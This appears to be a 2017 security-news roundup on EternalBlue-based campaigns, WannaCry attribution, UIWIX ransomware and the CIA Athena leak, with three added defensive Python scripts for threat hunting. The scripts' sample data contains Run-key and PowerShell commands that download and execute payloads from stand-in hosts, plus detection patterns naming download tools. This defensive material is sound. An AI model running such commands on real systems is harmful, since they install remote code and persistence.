Since the Shadow Brokers released the zero-day software vulnerabilities and hacking tools allegedly belonging to the NSA's elite hacking team, the Equation Group, several hacking groups and individual hackers have started using them in their own ways.
The April data dump was believed to be the most damaging release by the Shadow Brokers to date, as it publicly leaked lots of Windows hacking tools, including a dangerous Windows SMB exploit.
After the outbreak of WannaCry last week, security researchers identified multiple different campaigns exploiting the Windows SMB vulnerability (CVE-2017-0143) with the EternalBlue exploit, which has already compromised hundreds of thousands of computers worldwide.
Multiple sources in the hacking and intelligence community have even confirmed to me that there are many groups and individuals actively exploiting EternalBlue for different motives.
Moreover, the Eternalblue SMB exploit (MS17-010) has now been ported to Metasploit, a penetration testing framework that enables researchers as well as hackers to exploit this vulnerability easily.
Cybersecurity startup Secdo, an incident response platform, has recently discovered two separate hacking campaigns using the same Eternalblue SMB exploit at least three weeks before the outbreak of WannaCry global ransomware attacks.
So it would not be surprising to find more hacking groups, state-sponsored attackers, financially motivated organized criminal gangs and gray hat hackers exploiting EternalBlue to target large organizations and individuals.

The two newly discovered hacking campaigns, one traced back to Russia and another to China, are much more advanced than WannaCry, as sophisticated hackers are leveraging Eternalblue to install backdoors, Botnet malware and exfiltrate user credentials.
According to Secdo, these attacks might pose a much bigger risk than WannaCry, because even if companies block WannaCry and patch the SMB Windows flaw, "a backdoor may persist and compromised credentials may be used to regain access" to the affected systems.
Both campaigns use a similar attack flow: attackers initially infect the target machine with malware via different attack vectors, then use EternalBlue to infect other devices in the same network, and finally inject a stealthy thread into a legitimate application, which is then used to achieve persistence by either deploying a backdoor or exfiltrating login credentials.
Russian Campaign: Credential-Theft Attacks

Secdo discovered that attackers are injecting a malicious thread into the 'lsass.exe' process using Eternalblue.
Once infected, the thread begins downloading multiple malicious modules and then uses an SQLite DLL to retrieve users' saved login credentials from Mozilla's Firefox browser.
The stolen credentials are then sent to the attacker's command-and-control server via the encrypted Tor network in order to hide the real location of the C&C server.
Once sent, a ransomware variant of CRY128, which is a member of the infamous Crypton ransomware family, starts running in the memory and encrypts all the documents on the affected system.
According to Secdo, "at least 5 of the most popular Next Gen AV vendors and Anti-Malware vendors were running on the endpoints and were unable to detect and stop this attack. This is most likely due to the thread only nature of the attack."
This attack has been traced back to late April, that's three weeks prior to the WannaCry outbreak. The attack originates from Russia-based IP address (77.72.84.11), but that doesn't mean the hackers are Russian.
Chinese Campaign: Installs Rootkit and DDoS Botnet

This campaign was also seen in late April.
Using Eternalblue, a malicious thread is spawned inside of the lsass.exe process, similar to the above-mentioned credential theft attack.
But instead of remaining purely in memory, the initial payload then connects back to a Chinese command-and-control server on port 998 (117.21.191.69) and downloads a known rootkit backdoor, based on the ‘Agony rootkit’, to achieve persistence.
Once installed, the payload installs a Chinese Botnet malware, equipped with DDoS attack functionality, on the affected machine.
"These attacks demonstrate that many endpoints may still be compromised despite having installed the latest security patch," Secdo concluded.
"We highly recommend using a solution that has the ability to record events at the thread level in order to hunt, mitigate and assess potential damage as soon as possible."
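The behaviours attributed to these two campaigns, and to the Cyphort RAT described earlier on this page (Registry Run entries that download and execute more malware, and a step that closes port 445), give concrete things to hunt for in endpoint telemetry: a thread in lsass.exe whose start address is not backed by any loaded module, lsass.exe talking to anything that is not a domain controller, Run-key values that fetch from a URL or call a download-capable binary, and a firewall rule blocking inbound 445 created by an unexpected parent process. The script below is an added example, not Secdo's or Cyphort's tooling. The event schema is a Sysmon-like shape invented for the example, the records are constructed, and the domain-controller list, the 198.51.100.23 destination and the a.exe file name are assumptions; only port 998 comes from the article.

```python
import json
import re

# Constructed endpoint events in a Sysmon-like shape (field names invented for
# this example). ws01 is the infected host; ws02 shows ordinary activity.
SAMPLE_EVENTS = r'''
{"host":"ws01","event":"thread_create","target":"lsass.exe","source":"lsass.exe","start_module":null}
{"host":"ws01","event":"net_connect","image":"lsass.exe","dst":"198.51.100.23","dport":998}
{"host":"ws01","event":"reg_set","key":"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\upd","data":"cmd /c bitsadmin /transfer j http://198.51.100.23/a.exe C:\\Users\\Public\\a.exe & C:\\Users\\Public\\a.exe"}
{"host":"ws01","event":"proc_create","image":"netsh.exe","parent":"a.exe","cmdline":"netsh advfirewall firewall add rule name=upd dir=in protocol=tcp localport=445 action=block"}
{"host":"ws02","event":"thread_create","target":"lsass.exe","source":"lsass.exe","start_module":"lsasrv.dll"}
{"host":"ws02","event":"net_connect","image":"lsass.exe","dst":"10.0.0.10","dport":88}
{"host":"ws02","event":"reg_set","key":"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive","data":"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe /background"}
'''

DOMAIN_CONTROLLERS = {'10.0.0.10'}   # assumption: the only hosts lsass.exe should talk to
RUN_KEY = re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.I)
DOWNLOAD_EXEC = re.compile(
    r'https?://|bitsadmin|certutil|mshta|regsvr32|downloadfile|downloadstring', re.I)
BLOCK_445 = re.compile(r'advfirewall.*localport=445.*action=block', re.I)


def load_events(text):
    return [json.loads(line) for line in text.strip().splitlines() if line.strip()]


def hunt(events):
    """Apply four hunt rules; return (rule, host, detail) tuples in event order."""
    hits = []
    for e in events:
        kind = e['event']
        if (kind == 'thread_create' and e['target'].lower() == 'lsass.exe'
                and not e.get('start_module')):
            # a thread whose start address maps to no loaded module is injected code
            hits.append(('unbacked thread in lsass.exe', e['host'], f"source={e['source']}"))
        elif (kind == 'net_connect' and e['image'].lower() == 'lsass.exe'
                and e['dst'] not in DOMAIN_CONTROLLERS):
            hits.append(('lsass.exe outbound to non-DC', e['host'], f"{e['dst']}:{e['dport']}"))
        elif kind == 'reg_set' and RUN_KEY.search(e['key']) and DOWNLOAD_EXEC.search(e['data']):
            hits.append(('Run key fetches/executes payload', e['host'], e['key']))
        elif kind == 'proc_create' and BLOCK_445.search(e.get('cmdline', '')):
            hits.append(('inbound 445 blocked by firewall rule', e['host'], f"parent={e['parent']}"))
    return hits


if __name__ == '__main__':
    for rule, host, detail in hunt(load_events(SAMPLE_EVENTS)):
        print(f'{host}: {rule} ({detail})')
```

Each rule stands alone, but two or more of them firing on the same host within minutes is the pattern these campaigns leave; the ws02 records show why the lsass rules need the module and destination qualifiers, since lsass.exe legitimately creates threads and talks Kerberos to the domain controllers all day.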
These malicious campaigns went unnoticed for weeks because, unlike WannaCry, their purpose was different: to hold on to affected systems for a long time by achieving persistence and stealing credentials that can be used to regain access.
A recent example is “Adylkuzz,” a recently discovered stealthy cryptocurrency-mining malware that was also using the Windows SMB vulnerability at least two weeks before the outbreak of the WannaCry ransomware attacks.
These attacks are just the beginning: attacks like WannaCry have not been completely stopped, and given the broad impact of the NSA exploits, hackers and cyber criminals are eagerly awaiting the next Shadow Brokers release, which promised to leak more zero-days and exploits from next month.
Until then, users can do little beyond the basics to protect themselves from the coming attacks.
You can follow some basic security tips that I have mentioned in my previous article about how to disable SMB and prevent your devices from getting hacked.


WannaCry Does Not Fit North Korea's Style, Interests: Experts

20.5.2017 securityweek Ransomware
Some experts believe that, despite malware code similarities, the WannaCry ransomware is unlikely to be the work of North Korea, as the attack does not fit the country’s style and interests.

The WannaCry ransomware, also known as Wanna Decryptor, WanaCrypt0r, WannaCrypt, Wana Decrypt0r and WCry, has hit hundreds of thousands of systems worldwide, including ones housed by banks, hospitals, ISPs, government agencies, transportation companies and manufacturing plants.

The first clue that the WannaCry ransomware may have been created by North Korea was uncovered by Google researcher Neel Mehta. The expert noticed that a variant of WannaCry making the rounds in February, when the threat was less known, had code similarities with a tool used by the North Korea-linked cyber espionage group named Lazarus. The code in question was removed from later versions of the ransomware.

Security firms such as Symantec and Kaspersky confirmed the connection to Lazarus, and Kaspersky said it was “improbable” that this was a false flag. Even the Shadow Brokers, the group that leaked the Equation Group exploits leveraged by WannaCry, attributed the attack to North Korea.

However, not everyone agrees that North Korea is behind WannaCry. The threat intelligence team at endpoint security firm Cybereason believes North Korea is unlikely to be behind the campaign.

“Nothing in North Korea’s past cyber campaigns or in their conventional military and foreign policy fit this mold. Looking at national identity, foreign policy and strategic messaging will greatly reduce the likelihood that Pyongyang ordered this campaign,” the company said in a blog post on Friday.

Related: Industry Reactions to WannaCry Ransomware Attacks

One reason is that North Korea, guided by its self-reliance ideology, has never used commodity malware or generic tools in its cyberattacks. All the tools and exploits leveraged by the Lazarus group have been custom-built, Cybereason said.

Another reason for which North Korea is unlikely to be behind the WannaCry ransomware attack is the fact that China and Russia, two of the country’s biggest allies, were among the most affected. Furthermore, some of Pyongyang’s biggest enemies, including the U.S., Japan and South Korea, had fairly low infection rates.

The Lazarus group has been linked to several high-profile operations, including the 2014 attack on Sony Pictures, the 2016 attack on Bangladesh’s central bank, which resulted in the theft of $81 million, and some more recent campaigns targeting financial institutions. While North Korea has never officially taken responsibility for these attacks, Cybereason pointed out that the country has always left clear hints of its involvement as a way of sending a strategic message.

Since Lazarus has been linked to several profit-driven attacks, there is a possibility that the WannaCry attacks had a similar goal. However, experts believe that if North Korea was behind the campaign and the goal was to make money, it would have likely set up a better payment system, it wouldn’t have bothered removing the Lazarus code from the final version of WannaCry, and it wouldn’t have neglected to register the kill switch domain that allowed researchers to disrupt the campaign.

Cybereason is not the only company that is skeptical of North Korea’s involvement in the WannaCry attack. Bogdan Botezatu, senior e-threat specialist at Bitdefender, also believes that the scenario in which a state-sponsored actor – especially one as sophisticated as Lazarus – would switch to ransomware is unlikely.

“The attack wasn't targeted and there was no clear gain for them,” Botezatu told SecurityWeek. “It's doubtful they would use such a powerful exploit for anything else than espionage.”

The expert pointed out that Bitdefender took WannaCry apart and found only the worm module and the ransomware component – nothing to indicate that the malware could be used for anything else.


Stealth Backdoor Abused NSA Exploit Before WannaCrypt

20.5.2017 securityweek Ransomware
In the aftermath of the WannaCry ransomware outbreak, security researchers discovered numerous attacks that had been abusing the same EternalBlue exploit for malware delivery over the preceding several weeks.

Targeting a Server Message Block (SMB) vulnerability on TCP port 445, the exploit was made public in April by the group of hackers calling themselves “The Shadow Brokers” and is said to have been stolen from the National Security Agency-linked Equation Group. The targeted flaw was patched in March.

The fast spreading WannaCry brought EternalBlue to everyone’s attention, yet other malware families have been using it for infection long before the ransomware started using it. One of them was the Adylkuzz botnet, active since April 24, researchers revealed.

Now, Cyphort says that evidence on a honeypot server suggests attacks on SMB were active in early May, and they were dropping a stealth Remote Access Trojan (RAT) instead of ransomware. The malware didn’t have the worm component and didn’t spread like WannaCry.

The malware appears to have been distributed from an IP (182.18.23.38) located in China. Following successful exploitation, an encrypted payload is sent as a shellcode, and the security researchers found a DLL embedded in the shellcode, which they say “is basically a Trojan which downloads additional malware and receives commands from its controller.”

One of the files downloaded by this malware is meant to close port 445, thus preventing other malware from abusing the same flaw. Another file is believed to be a second-stage payload. The RAT sets a series of Registry Run entries to download and execute additional malware, the researchers say.

The malware attempts to delete a number of users and to terminate and/or delete various files or processes. A memory dump reveals that it is connected to ForShare 8.28, a remote access tool hosted on a Chinese website.

The RAT can receive and execute commands from the server, monitor the screen, capture audio and video, monitor the keyboard, transfer data, delete files, terminate processes, execute files, enumerate files and processes, download files, and control the machine.

Because the threat closes port 445, Cyphort believes the actor was aware of the EternalBlue vulnerability and was attempting to keep other malware out of the vulnerable machines.
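The Registry Run entries described above are the kind of persistence a defender can audit on every Windows host. The following Python script is an added example, not code from Cyphort or from the original article: it parses a constructed `reg export` style dump of the Run key (the value names, paths and URL in it are made up for illustration, not indicators from the page) and scores each autorun entry against a few heuristics that match the behaviour described here: fetching content from a URL, running from a user-writable directory, hiding its window, or loading code through rundll32 and similar system hosts.

```python
import re
from typing import Dict, List, Tuple

# Constructed `reg export` style dump of the HKLM Run key. Every name, path
# and URL here is made up for illustration; none is an indicator from the
# article. (A real export is UTF-16 text; read it with encoding="utf-16".)
SAMPLE_RUN_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Program Files\\Windows Defender\\MSASCuiL.exe"
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svchost_update"="powershell -w hidden -c \"iwr http://example.invalid/p.exe -OutFile C:\\Windows\\Temp\\p.exe; C:\\Windows\\Temp\\p.exe\""
"loader"="rundll32.exe C:\\Users\\Public\\x.dll,Start"
"""

# "Name"="Value" lines; reg export escapes backslashes and double quotes.
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"$')

# Heuristics modelled on the behaviour described in the article: the RAT
# sets Run entries that download and execute more malware. Each rule is a
# label plus a case-insensitive pattern applied to the unescaped command.
_RULES: List[Tuple[str, re.Pattern]] = [
    ("fetches content from a URL",
     re.compile(r"https?://|downloadfile|downloadstring|invoke-webrequest|\biwr\b|certutil|bitsadmin", re.I)),
    ("runs from a user-writable location",
     re.compile(r"\\(windows\\temp|temp|users\\public|appdata\\local\\temp)\\", re.I)),
    ("hides its window or uses encoded commands",
     re.compile(r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b", re.I)),
    ("loads code via a script host or rundll32/regsvr32",
     re.compile(r"\b(rundll32|regsvr32|mshta|wscript|cscript)(\.exe)?\b", re.I)),
]


def parse_run_export(text: str) -> Dict[str, str]:
    """Return {value name: command line} from a reg export of a Run key."""
    entries: Dict[str, str] = {}
    for line in text.splitlines():
        m = _VALUE_RE.match(line.strip())
        if not m:
            continue  # header, key path or blank line
        # One left-to-right pass turns \\ into \ and \" into " without
        # mangling a backslash that precedes a quote.
        entries[m.group("name")] = re.sub(r"\\(.)", r"\1", m.group("value"))
    return entries


def triage_run_entries(text: str) -> Dict[str, List[str]]:
    """Map every Run entry to the list of heuristic labels it triggers."""
    return {
        name: [label for label, pattern in _RULES if pattern.search(cmd)]
        for name, cmd in parse_run_export(text).items()
    }


def suspicious_entries(text: str, min_hits: int = 1) -> List[str]:
    """Names of entries that trigger at least `min_hits` heuristics, sorted."""
    return sorted(
        name for name, hits in triage_run_entries(text).items() if len(hits) >= min_hits
    )


if __name__ == "__main__":
    for name, hits in triage_run_entries(SAMPLE_RUN_EXPORT).items():
        status = "SUSPICIOUS" if hits else "ok"
        print(f"{status:10s} {name}: {', '.join(hits) or '-'}")
```

Point it at a real export (`reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg` on the host, then read the file with `encoding="utf-16"`) and the per-user `HKCU` key as well; the rules are deliberately simple and should be tuned to the software inventory of the environment, since legitimate updaters also fetch from URLs.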

“We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February. We found similarities in terms of their IOCs,” the security researchers say.

In a report this week, Secdo also claims to have found evidence of malware abusing EternalBlue weeks before WannaCry emerged. One of the malicious programs appears to be a ransomware family that also steals user credentials.

The researchers describe a “new evasive attack that leaves no trace and has been infecting organizations using NSA exploits since the mid-April.” They add: “The ransomware is the most apparent payload, yet under the surface a more sophisticated attack occurred that would have gone unnoticed.”

As part of this attack, the researchers say, actors used an EternalBlue-based worm to infect all machines in a compromised network, and also deployed a backdoor for persistence or exfiltrated login credentials.

One of the attacks originated from a Russian IP (77.72.84.11). Using the NSA-linked exploit for compromise, attackers spawned a thread inside a legitimate application and used it to download multiple modules, including an SQLite DLL from SourceForge used to steal login credentials from Firefox.

Stolen data is exfiltrated through the TOR network, after which “a ransomware variant of CRY128 that runs purely in-memory encrypts all the documents on the system,” the researchers say.

The recently discovered UIWIX ransomware that spreads via the EternalBlue exploit is also being executed only in memory, resulting in a fileless infection. UIWIX also contains code meant to steal a broad range of login credentials.

Another attack was linked to a Chinese actor and involved the distribution of a backdoor. The attack starts with process injection, similar to the above, but ends with the download of a known rootkit backdoor (based on Agony). The downloaded file, 666.exe, is blocked by antivirus programs.

“Based on these findings, we suspect that the scope of the damage is much greater than previously thought, and that there are at least 3 different groups that have been leveraging the NSA exploit to infect enterprise networks since late April,” Secdo notes.

In January, the United States Computer Emergency Readiness Team (US-CERT) issued an alert after Shadow Brokers revealed they had a zero-day exploit targeting SMB up for sale. In February, a Windows SMBv3 zero-day vulnerability (CVE-2017-0016) was assessed with a High severity rating, after initially being believed to be Critical.


UIWIX, the Fileless Ransomware that leverages NSA EternalBlue Exploit to spread
20.5.2017 securityaffairs BigBrothers
Security experts discovered a new ransomware family, dubbed UIWIX, that uses the NSA-linked EternalBlue exploit for distribution.
The effects of the militarization of cyberspace are dangerous and unpredictable. Malicious code developed by a government can create serious problems for Internet users; the recent massive WannaCry attack, which used the EternalBlue exploit to spread, demonstrates it.

Now a new ransomware, dubbed UIWIX, was discovered to be using the NSA-linked EternalBlue exploit for distribution.

UIWIX is a fileless malware discovered by experts at Heimdal Security early this week while investigating WannaCry.

Like WannaCry, UIWIX exploits the same vulnerability in the Windows SMB protocol, but the new threat runs entirely in the memory of the infected system after EternalBlue has been exploited.

“As we feared in yesterday’s alert, another ransomware variant, known as Uiwix, has been spotted in the wild, exploiting the same vulnerability in Windows SMBv1 and SMBv2 as WannaCry used. Cyber criminals are quick to incorporate vulnerabilities, especially when they have the potential to infect a large number of targets like the EternalBlue exploit has.” reads the analysis published by Heimdal Security.

Malware researchers at Trend Micro also investigated UIWIX and confirmed that it is a stealthier threat that is hard to analyze: it doesn’t write files on the infected machine and it is also able to detect the presence of a virtual machine (VM) or sandbox.

“So how is UIWIX different? It appears to be fileless: UIWIX is executed in memory after exploiting EternalBlue. Fileless infections don’t entail writing actual files/components to the computer’s disks, which greatly reduces its footprint and in turn makes detection trickier.” wrote Trend Micro.

“UIWIX is also stealthier, opting to terminate itself if it detects the presence of a virtual machine (VM) or sandbox. Based on UIWIX’s code strings, it appears to have routines capable of gathering the infected system’s browser login, File Transfer Protocol (FTP), email, and messenger credentials.”

UIWIX is able to harvest browser login, File Transfer Protocol (FTP), email, and messenger credentials from the infected system.

Unlike WannaCry, UIWIX leverages a Dynamic-link Library (DLL) to gain persistence.

Below is a summary of WannaCry’s and UIWIX’s notable features as reported by Trend Micro:

Feature | WannaCry | UIWIX
Attack vectors | SMB vulnerabilities (MS17-010), TCP port 445 | SMB vulnerabilities (MS17-010), TCP port 445
File type | Executable (EXE) | Dynamic-link Library (DLL)
Appended extension | {original filename}.WNCRY | ._{unique id}.UIWIX
Autostart and persistence mechanisms | Registry | None
Anti-VM, VM check, or anti-sandbox routines | None | Checks presence of VM and sandbox-related files or folders
Network activity | On the internet, scans for random IP addresses to check if it has an open port 445; connects to .onion site using Tor browser | Uses mini-tor.dll to connect to .onion site
Exceptions (doesn’t execute if it detects certain system components) | None | Terminates itself if found running in Russia, Kazakhstan, and Belarus
Exclusions (directories or file types it doesn’t encrypt) | Avoids encrypting files in certain directories | Avoids encrypting files in two directories, and files with certain strings in their file name
Network scanning and propagation | Yes (worm-like propagation) | No
Kill switch | Yes | No
Number of targeted file types | 176 | All files in the affected system except those in its exclusion list
Shadow copies deletion | Yes | No
Languages supported (ransom notes, payment site) | Multilingual (27) | English only

Another interesting behavior observed by the researchers is that the malware terminates itself if the compromised computer is located in Russia, Kazakhstan, and Belarus.

For network activity, the malware uses mini-tor.dll to connect to a .onion site, whereas WannaCry scanned the Internet for random IP addresses to check whether port 445 was open and connected to its .onion site using the Tor browser.

Most evident differences between WannaCry and UIWIX are:

UIWIX doesn’t implement the worm spreading capabilities;
UIWIX doesn’t include a kill-switch;
UIWIX uses a different Bitcoin address for each victim;
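The first difference above (and the “Network activity” and “Network scanning and propagation” rows of the table) is what a network defender can actually observe: a WannaCry-infected host probes many different addresses on TCP port 445 within a short time, while UIWIX produces no such fan-out. The following Python script is an added example, not Trend Micro’s code or tooling from the original article: it parses a constructed firewall connection log (the hosts and timestamps are made up; the 203.0.113.0/24 and 198.51.100.0/24 destinations are documentation ranges standing in for Internet addresses) and flags any source that contacts at least ten distinct destinations on port 445 inside a 60-second sliding window, also counting how many of those destinations lie outside RFC 1918 space, which is the hallmark of the Internet-wide scanning the table attributes to WannaCry.

```python
import ipaddress
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, NamedTuple

# Constructed firewall log: timestamp, source, destination, destination
# port, action. None of these addresses are indicators from the article.
SAMPLE_CONN_LOG = """\
2017-05-12T10:00:00Z 10.1.4.22 10.1.4.1 445 ALLOW
2017-05-12T10:00:01Z 10.1.4.22 10.1.4.2 445 ALLOW
2017-05-12T10:00:02Z 10.1.4.22 10.1.4.3 445 ALLOW
2017-05-12T10:00:03Z 10.1.4.22 10.1.4.4 445 ALLOW
2017-05-12T10:00:04Z 10.1.4.22 10.1.4.5 445 DENY
2017-05-12T10:00:05Z 10.1.4.22 10.1.4.6 445 ALLOW
2017-05-12T10:00:06Z 10.1.4.22 10.1.4.7 445 DENY
2017-05-12T10:00:07Z 10.1.4.22 10.1.4.8 445 ALLOW
2017-05-12T10:00:08Z 10.1.4.22 203.0.113.9 445 DENY
2017-05-12T10:00:09Z 10.1.4.22 203.0.113.77 445 DENY
2017-05-12T10:00:10Z 10.1.4.22 198.51.100.5 445 DENY
2017-05-12T10:00:03Z 10.1.4.50 10.1.4.10 445 ALLOW
2017-05-12T10:00:09Z 10.1.4.50 10.1.4.10 445 ALLOW
2017-05-12T10:00:15Z 10.1.4.50 10.1.4.11 445 ALLOW
2017-05-12T10:00:20Z 10.1.4.50 10.1.4.10 445 ALLOW
2017-05-12T10:00:21Z 10.1.4.50 10.1.4.12 80 ALLOW
"""


class Conn(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int
    action: str


# Checked explicitly rather than via ipaddress.is_private, because that
# property also treats the documentation ranges used above as private.
_RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_rfc1918(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in _RFC1918)


def parse_conn_log(text: str) -> List[Conn]:
    """Parse the five-column log format above; malformed lines are skipped."""
    conns: List[Conn] = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ")
        conns.append(Conn(ts, parts[1], parts[2], int(parts[3]), parts[4]))
    return conns


def detect_smb_scanners(conns: List[Conn], window_s: int = 60,
                        min_distinct: int = 10, port: int = 445) -> Dict[str, dict]:
    """Flag sources whose distinct-destination fan-out on `port` reaches
    `min_distinct` within any sliding window of `window_s` seconds.
    Denied attempts count too: a worm's probes show up either way."""
    by_src: Dict[str, List[Conn]] = defaultdict(list)
    for c in conns:
        if c.dport == port:
            by_src[c.src].append(c)
    window = timedelta(seconds=window_s)
    hits: Dict[str, dict] = {}
    for src, recs in by_src.items():
        recs.sort(key=lambda c: c.ts)
        best_start, best_dsts = None, set()
        for i, start in enumerate(recs):
            dsts = {c.dst for c in recs[i:] if c.ts - start.ts <= window}
            if len(dsts) > len(best_dsts):
                best_start, best_dsts = start.ts, dsts
        if len(best_dsts) >= min_distinct:
            hits[src] = {
                "window_start": best_start,
                "distinct_dsts": len(best_dsts),
                "outside_rfc1918": sum(1 for d in best_dsts if not is_rfc1918(d)),
            }
    return hits


if __name__ == "__main__":
    for src, info in detect_smb_scanners(parse_conn_log(SAMPLE_CONN_LOG)).items():
        print(f"{src}: {info['distinct_dsts']} distinct port-445 targets from "
              f"{info['window_start']:%H:%M:%S}, {info['outside_rfc1918']} outside RFC 1918")
```

The threshold and window are starting points: on a flat network a file server client rarely touches more than a handful of SMB peers per minute, so ten distinct destinations in sixty seconds separates propagation from normal use well, and any non-zero `outside_rfc1918` count from an internal host is worth an immediate look because nothing legitimate inside a hospital or office network should be opening SMB sessions to the Internet.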
Clearly, the WannaCry attack represents a great opportunity for the cybercrime ecosystem: every time a new flaw is discovered, crooks try to exploit it in attacks in the wild, for example by including the exploit code in crimeware kits used in hacking campaigns.

Recently we reported the case of the Adylkuzz botnet, another malware that used the EternalBlue exploit to spread a Monero miner.

“It’s not a surprise that WannaCry’s massive impact turned the attention of other cybercriminals into using the same attack surface vulnerable systems and networks are exposed to. Apart from WannaCry and UIWIX, our sensors also detected a Trojan delivered using EternalBlue—Adylkuzz (TROJ_COINMINER.WN). This malware turns infected systems into zombies and steals its resources in order to mine for the cryptocurrency Monero.” Trend Micro concludes.

“UIWIX, like many other threats that exploit security gaps, is a lesson on the real-life significance of patching.”


WikiLeaks revealed CIA Athena Spyware, the malware that targets all Windows versions
20.5.2017 securityaffairs BigBrothers

Wikileaks released the documentation for the Athena Spyware, a malware that could infect and remote control almost any Windows machine.
Last Friday, Wikileaks released the documentation for the AfterMidnight and Assassin malware platforms; today the organization leaked a new batch of the CIA Vault 7 dump that includes the documentation for a spyware framework dubbed Athena/Hera.

The batch of CIA files includes a user manual of the Athena platform, an overview of the technology, and a demo on how to use the malware.

Reading the documents, it emerges that almost any Windows system could be infected by the two spyware: Athena works on Windows XP through Windows 10, and Hera on Windows 8 through Windows 10.

The Athena/Hera malware was used by the CIA to take remote control of infected Windows machines.
“The Athena System fulfills COG/NOD’s need for a remote beacon/loader. Table 2 shows the system components available in Athena/Hera v1.0. The target computer operating systems are Windows XP Pro SP3 32-bit (Athena only), Windows 7 32-bit/64-bit, Windows 8.1 32-bit/64-bit, Windows 2008 Enterprise Server, Windows 2012 Server, and Windows 10.” reads the system overview included in the user guide. “Ubuntu v14.04 is the validated Linux version. Apache 2.4 is the validated web server for the Listening Post.”

The Athena spyware was written in Python and appears to date back to August 2015. If confirmed, this is worrying news, because Microsoft had released Windows 10 only in July 2015.

Athena is the result of joint work between CIA developers and peers at Siege Technologies, a cyber security firm that specializes in offensive cyber security.

“Athena is a beacon loader developed with Siege Technologies. At the core it is a very simple implant application. It runs in user space and beacons from the srvhost process. The following diagram shows the concept of operation.” states the Athena Technology Overview.


The documents leaked by Wikileaks reveal the ability of the Athena spyware to modify its configuration in real time, customizing it to a specific operation.

“Once installed, the malware provides a beaconing capability (including configuration and task handling), the memory loading/unloading of malicious payloads for specific tasks and the delivery and retrieval of files to/from a specified directory on the target system,” WikiLeaks claims.

WikiLeaks has not provided any detail about the operations the agency conducted using Athena, but it is not hard to imagine how the intelligence agency would use this program to spy on its targets.

Below is the list of the main dumps leaked by WikiLeaks so far:

The Year Zero that revealed CIA hacking exploits for hardware and software.
Weeping Angel spying tool to hack Samsung smart TV and use them as
The Dark Matter dump is containing iPhone and Mac hacking exploits.
The Marble batch focused on a framework used by the CIA to make hard the attribution of cyber attacks.
The Grasshopper batch that reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.
The Scribbles Project for document tracking.
Archimedes man-in-the-middle (MitM) attack tool.
AfterMidnight and Assassin malware platforms.


North Korea Denies Role in Global Cyberattack

20.5.2017 securityweek Attack
North Korea on Friday angrily dismissed reports linking its isolated regime to the global cyberattack that held thousands of computers to virtual ransom.

Up to 300,000 computers in 150 countries were hit by the WannaCry worm, which seizes systems and demands payment in Bitcoin to return control to users.

The code used in the latest attack is similar to that used in past hacks blamed on Kim Jong-Un's regime, leading some to point the finger at Pyongyang.

But the North has now denied the claims, notably but not exclusively advanced by South Korean experts, and hit back Friday to accuse its opponents of spreading propaganda.

"It is ridiculous," Kim In-Ryong, North Korea's deputy ambassador to the United Nations, told reporters, suggesting Washington and Seoul were behind the allegation.

"Whenever something strange happens, it is the stereotyped way of the United States and the hostile forces to kick off a noisy anti-DPRK campaign."

Related: WannaCry Doesn't Fit North Korea's Style, Interests, Experts Say

Seoul internet security firm Hauri, known for its vast troves of data on Pyongyang's hacking activities, has been warning of ransomware attacks since last year.

The firm's Simon Choi told AFP that the WannaCry malware shares code with tools used to target Sony Pictures and Bangladesh, in previous attacks blamed on the North.

Researchers in the US, Russia and Israel have also pointed to a potential North Korean link -- but it is notoriously hard to attribute cyberattacks.

Google researcher Neel Mehta has shown similarities between WannaCry and code used by the Lazarus hacking group, widely believed to be connected to Pyongyang.


Google Launches Security Services for Android

20.5.2017 securityweek Android
Google this week launched a set of security services designed to bring improved protection and visibility for Android users.

Dubbed Google Play Protect, the new product is built into all devices with Google Play and should provide “comprehensive security services for Android,” the Internet giant says.

“Whether you’re checking email for work, playing Pokémon Go with your kids or watching your favorite movie, confidence in the security of your device and data is important,” Edward Cunningham, Product Manager, Android Security, notes.

“We know you want to be confident that your Android devices are safe and secure, which is why we are doubling down on our commitment to security,” he continues.

There are 2 billion active Android devices globally and Google performs more than 50 billion application scans every day to keep them safe.

With the help of machine learning, Google says it can discover new risks, identify potentially harmful apps, and either protect devices from them or remove them where they have been already installed.

Google also rigorously analyzes all apps before publishing them on the Play Store, though it isn’t unheard of for malicious programs to slip into the marketplace and infect users by the millions.

According to Cunningham, Play Protect can warn about bad apps downloaded from other sources as well. It is meant to keep an eye on all applications that perform nefarious operations on a device, in an attempt to keep users’ data safe.

One of the features included in Google Play Protect is Find My Device, which is meant to help users even when they lose their devices.

“With Find My Device you can locate, ring, lock and erase your Android devices—phones, tablets, and even watches. This feature is built in and enabled on all devices,” Cunningham notes.

Users interested in learning more on this application should head to android.com/find or simply check the Find My Device app.

The new features will be rolling out to Android devices over the coming weeks.

Numerous infected applications were found in Google Play this year, ranging from fake system updates to mobile games, utility programs, and fake versions of popular streaming apps. In June last year, malicious versions of Pokémon GO landed in the storefront.


Disney Blackmailed Over Apparent Movie Hack: Reports

20.5.2017 securityweek Hacking
Disney chief Bob Iger said Monday hackers claiming to have access to one of the company's unreleased movies were demanding a "huge" ransom, according to US media reports.

He did not reveal which film had been stolen but said the company would not be giving in to the blackmail attempt, according to The Hollywood Reporter, quoting Iger from a meeting in New York with employees of the Disney-owned ABC television network.

